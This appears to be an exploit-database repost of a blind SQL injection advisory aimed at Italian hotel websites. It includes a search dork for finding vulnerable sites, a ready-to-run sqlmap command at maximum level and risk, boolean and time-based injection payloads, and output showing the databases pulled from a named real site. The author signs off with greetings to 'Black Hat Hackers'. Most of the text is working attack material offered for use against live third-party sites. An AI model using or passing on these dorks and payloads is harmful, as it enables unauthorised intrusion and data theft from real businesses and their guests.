Edit Report

Our sensors found this exploit at:

Below is a copy:

Italian Hotels Blind SQL Injection vulnerability
# Exploit Title:Italian Hotels Blind SQL Injection vulnerability
# Date:30/11/2019
# Dork: inurl:camere-dettaglio.php?id=
# Exploit Author:H9xHacker
# Tested on:Linux

Reverse check

ip: .php?id= (There are 202 domains hosted on this server.)

# Demo

# Admin control panel path


# Poc:

sqlmap --level=5 --risk=3 --timeout=10 --threads=10 --random-agent -u '' --no-cast --batch --dbs

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=32' AND 2568=2568-- AtOc

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
    Payload: id=32' OR (SELECT 9574 FROM (SELECT(SLEEP(5)))kdFW)-- xPIg
web application technology: Apache, PHP
back-end DBMS: MySQL >= 5.0.12
available databases [2]:
[*] information_schema
[*] ristorantelaspada_it_01

Greets:Black Hat Hackers 

Copyright ©2022 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.